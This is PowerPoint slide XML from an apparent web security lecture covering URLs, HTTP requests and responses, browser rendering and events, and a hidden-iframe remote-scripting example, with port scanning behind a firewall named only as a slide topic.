                <a:gd name="T1" fmla="*/ 4836 h 176"/>
                <a:gd name="T2" fmla="*/ 585 w 1544"/>
                <a:gd name="T3" fmla="*/ 186 h 176"/>
                <a:gd name="T4" fmla="*/ 1190 w 1544"/>
                <a:gd name="T5" fmla="*/ 6030 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 154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4" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="1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1506" y="2813"/>
              <a:ext cx="10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2) “check this out”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50188" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5599114" y="4040981"/>
            <a:ext cx="955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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50189" name="Picture 17" descr="cisco-520-2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0291" y="4355308"/>
            <a:ext cx="1425575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53250" y="2156222"/>
            <a:ext cx="1855788" cy="1065609"/>
            <a:chOff x="4439" y="1621"/>
            <a:chExt cx="1169" cy="895"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50201" name="Picture 11" descr="CompaqAlphaServerES4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80" y="1621"/>
              <a:ext cx="728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2" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4439" y="2054"/>
              <a:ext cx="3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Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4541" y="2204"/>
              <a:ext cx="263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000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan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981828" y="3657600"/>
            <a:ext cx="1751013" cy="1077516"/>
            <a:chOff x="4457" y="2882"/>
            <a:chExt cx="1103" cy="905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50198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55" y="2882"/>
              <a:ext cx="905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9" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4504" y="3017"/>
              <a:ext cx="34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Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4457" y="3152"/>
              <a:ext cx="263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000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan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825997" y="4151714"/>
            <a:ext cx="642786" cy="349820"/>
            <a:chOff x="3048" y="3297"/>
            <a:chExt cx="456" cy="465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50196" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3048" y="3297"/>
              <a:ext cx="36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Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3208" y="3435"/>
              <a:ext cx="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000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan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146303" y="3911205"/>
            <a:ext cx="3173413" cy="516732"/>
            <a:chOff x="1411" y="3095"/>
            <a:chExt cx="1999" cy="434"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50194" name="Freeform 32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1887" y="3095"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 4836 h 176"/>
                <a:gd name="T2" fmla="*/ 585 w 1544"/>
                <a:gd name="T3" fmla="*/ 186 h 176"/>
                <a:gd name="T4" fmla="*/ 1190 w 1544"/>
                <a:gd name="T5" fmla="*/ 6030 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 154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4" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="1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33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1411" y="3296"/>
              <a:ext cx="12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3) port scan results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2400" y="114300"/>
            <a:ext cx="22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consequence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scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347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33400" y="97155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Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Exchange data between a client-side app running in a browser and server-side app,  without reloading page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Java Applet/ActiveX control/Flash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Can make HTTP requests and interact with client-side JavaScript code,  but requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>LiveConnect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> (not available on all browsers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>XML-RPC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Open  standards-based technology that requires XML-RPC libraries on server and in your client-side code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Simple HTTP via a hidden IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/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1515664" y="4832434"/>
            <a:ext cx="5814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See:  http://developer.apple.com/internet/webcontent/iframe.html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676400" y="4248150"/>
            <a:ext cx="6324600" cy="646331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Important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Point: A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page can maintain bi-directional communication with browser (until user closes/quits)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05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Simple remote scripting example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1047750"/>
            <a:ext cx="771525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lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"&gt;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400" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>handleResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>() {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400" dirty="0"/>
              <a:t>      alert('this function is called from server.html') }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400" dirty="0"/>
              <a:t>&lt;/script&gt;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400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>RSIFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"     name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>RSIFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"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400" dirty="0"/>
              <a:t>      style="width:0px; height:0px; border: 0px"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400" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="blank.html"&gt;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400" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>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="server.html" target="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>RSIFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"&gt;make RPC call&lt;/a&gt; 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943350"/>
            <a:ext cx="771525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&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>"&gt;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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>window.parent.handleResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>()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&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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646114" y="4800600"/>
            <a:ext cx="8349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RPC can be done silently in JavaScript, passing and receiving arguments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762000" y="3486150"/>
            <a:ext cx="7733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/>
              <a:t>server.html: another page on same server, could be server.php, etc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762000" y="666750"/>
            <a:ext cx="8180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/>
              <a:t>client.html: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“RPC” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by passing arguments to server.html in query string </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4924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URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135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971550"/>
            <a:ext cx="7848600" cy="3829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Global identifiers of network-retrievable documents </a:t>
            </a:r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sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a: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/>
              <a:t>http://stanford.edu:81/class?name=cs155#homework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Special characters are encoded as hex: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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = newline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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = space, %2B = +  (special exception)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09600" y="2114550"/>
            <a:ext cx="60960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219200" y="2114550"/>
            <a:ext cx="106680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2286000" y="2114550"/>
            <a:ext cx="246063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2514600" y="2114550"/>
            <a:ext cx="53340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3048000" y="2114550"/>
            <a:ext cx="91440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3962400" y="2114550"/>
            <a:ext cx="1387475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2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="103188" y="2647950"/>
            <a:ext cx="963612" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1462"/>
              <a:gd name="adj2" fmla="val 70592"/>
              <a:gd name="adj3" fmla="val -111338"/>
              <a:gd name="adj4" fmla="val 6769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 dirty="0"/>
              <a:t>Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="3196830"/>
            <a:ext cx="1143000" cy="289320"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1787"/>
              <a:gd name="adj2" fmla="val 63788"/>
              <a:gd name="adj3" fmla="val -297686"/>
              <a:gd name="adj4" fmla="val 8599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Hostname</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3333750"/>
            <a:ext cx="914400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20129"/>
              <a:gd name="adj2" fmla="val 56060"/>
              <a:gd name="adj3" fmla="val -427330"/>
              <a:gd name="adj4" fmla="val 3369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Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3181350"/>
            <a:ext cx="990600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -269327"/>
              <a:gd name="adj4" fmla="val -5719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Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24590" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3333750"/>
            <a:ext cx="990600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -309381"/>
              <a:gd name="adj4" fmla="val -1655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24591" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="2800350"/>
            <a:ext cx="1292225" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -107171"/>
              <a:gd name="adj4" fmla="val -3833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Fragment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681163"/>
            <a:ext cx="8305800" cy="2446824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080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GET /index.html HTTP/1.1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Accept: image/gif, image/x-bitmap, image/jpeg, */*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Accept-Language: en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: Keep-Alive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User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)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Host: www.example.com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Referer: http://www.google.com?q=dingbats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1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Request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2" y="120015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Method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057402" y="1200150"/>
            <a:ext cx="58221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File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200402" y="1200150"/>
            <a:ext cx="166808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HTTP version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990600" y="1443038"/>
            <a:ext cx="0" cy="210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362200" y="1443038"/>
            <a:ext cx="0" cy="210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86200" y="1443038"/>
            <a:ext cx="0" cy="210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620000" y="1200150"/>
            <a:ext cx="1095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Headers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7391400" y="1482329"/>
            <a:ext cx="60960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600200" y="4095750"/>
            <a:ext cx="240322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Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data – none for GET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 flipV="1">
            <a:off x="1066800" y="3943350"/>
            <a:ext cx="914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200400" y="3679032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Blank line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 flipV="1">
            <a:off x="762000" y="3714750"/>
            <a:ext cx="2438400" cy="642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4768" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="595316" y="4514851"/>
            <a:ext cx="6870727" cy="46166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GET :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>no side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect           POST :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>possible side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect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54075" y="1941909"/>
            <a:ext cx="7086600" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80808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HTTP/1.0 200 OK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Date: Sun, 21 Apr 1996 02:20:42 GMT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Server: Microsoft-Internet-Information-Server/5.0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Connection: keep-alive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Content-Type: text/html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Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT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Set-Cookie: …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Content-Length: 2543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&lt;HTML&gt; Some data... blah, blah, blah &lt;/HTML&gt;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77876" y="1214438"/>
            <a:ext cx="166808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HTTP version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539875" y="1457325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597150" y="1214438"/>
            <a:ext cx="14927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Status code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237039" y="1214438"/>
            <a:ext cx="183896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Reason phrase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2530475" y="1457326"/>
            <a:ext cx="685800" cy="4964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3063875" y="1457326"/>
            <a:ext cx="1676400" cy="5536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483475" y="1271588"/>
            <a:ext cx="1095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Headers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6569075" y="1514476"/>
            <a:ext cx="1371600" cy="7822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8199439" y="2753916"/>
            <a:ext cx="6848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Data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5562600" y="3039666"/>
            <a:ext cx="2941637" cy="1437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4324350"/>
            <a:ext cx="9268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Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27663" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="344490" y="3714750"/>
            <a:ext cx="569910" cy="681038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169607 w 435078"/>
              <a:gd name="T1" fmla="*/ 1460090 h 1460090"/>
              <a:gd name="T2" fmla="*/ 36872 w 435078"/>
              <a:gd name="T3" fmla="*/ 589936 h 1460090"/>
              <a:gd name="T4" fmla="*/ 66368 w 435078"/>
              <a:gd name="T5" fmla="*/ 117987 h 1460090"/>
              <a:gd name="T6" fmla="*/ 435078 w 435078"/>
              <a:gd name="T7" fmla="*/ 0 h 1460090"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 435078"/>
              <a:gd name="T13" fmla="*/ 0 h 1460090"/>
              <a:gd name="T14" fmla="*/ 435078 w 435078"/>
              <a:gd name="T15" fmla="*/ 1460090 h 14600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5078" h="1460090">
                <a:moveTo>
                  <a:pt x="169607" y="1460090"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111843" y="1136855"/>
                  <a:pt x="54079" y="813620"/>
                  <a:pt x="36872" y="589936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19665" y="366252"/>
                  <a:pt x="0" y="216310"/>
                  <a:pt x="66368" y="117987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132736" y="19664"/>
                  <a:pt x="283907" y="9832"/>
                  <a:pt x="4350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 and events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5120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 browser execution model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each browser window or frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loads content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Renders it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Processes HTML and scripts to display page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May involve images, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>subframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Responds to events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Events can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User actions: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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendering: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OnBeforeUnload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Timing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(),  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>clearTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()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55295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www.w3schools.com/js/js_output.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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3" y="1257302"/>
            <a:ext cx="5571141" cy="31393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Web Page&lt;/h1&gt;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&lt;button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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(5 + 6)"&gt;Try it&lt;/button&gt;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20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013" b="6005"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="514351"/>
            <a:ext cx="8686800" cy="454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672" y="157117"/>
            <a:ext cx="545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http://phet.colorado.edu/en/simulations/category/html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="22467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5/18/2007" val="LastModifie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19226</TotalTime>
  <Words>1118</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>250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Module 5.3: HTTP &amp; Content Rendering</vt:lpstr>
      <vt:lpstr>HTTP </vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Rendering Content</vt:lpstr>
      <vt:lpstr>Rendering and events</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Document Object Model</vt:lpstr>
      <vt:lpstr>DOM for the HTML Table</vt:lpstr>
      <vt:lpstr>Changing HTML using Script, DOM</vt:lpstr>
      <vt:lpstr>HTML Image Tags</vt:lpstr>
      <vt:lpstr>Img tag</vt:lpstr>
      <vt:lpstr>If you visit this website --</vt:lpstr>
      <vt:lpstr>Image tag security issues</vt:lpstr>
      <vt:lpstr>JavaScript onError</vt:lpstr>
      <vt:lpstr>JavaScript timing</vt:lpstr>
      <vt:lpstr>Port scanning behind firewall</vt:lpstr>
      <vt:lpstr>Remote scripting</vt:lpstr>
      <vt:lpstr>Simple remote scripting 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5: Web Client Security</dc:title>
  <dc:creator>cse</dc:creator>
  <cp:lastModifiedBy>Deepak Kumar</cp:lastModifiedBy>
